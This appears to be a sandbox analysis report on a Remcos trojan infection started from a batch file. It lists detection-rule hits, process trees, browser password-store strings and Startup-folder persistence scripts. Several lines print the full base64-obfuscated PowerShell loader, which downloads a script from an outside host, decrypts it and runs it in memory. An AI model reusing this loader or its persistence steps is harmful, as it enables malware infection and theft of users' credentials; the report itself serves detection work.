                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@121/98@10/3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,13_2_00413D4C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,13_2_004148B6
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\dwm.batJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1796:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:524:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1604:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3324:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqrn3wwh.1eg.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\5kldoushde.bat" "
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: powershell.exe, powershell.exe, 0000000F.00000002.1692346355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: powershell.exe, 0000000D.00000002.1699267968.00000000030C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_15-33223
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\5kldoushde.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 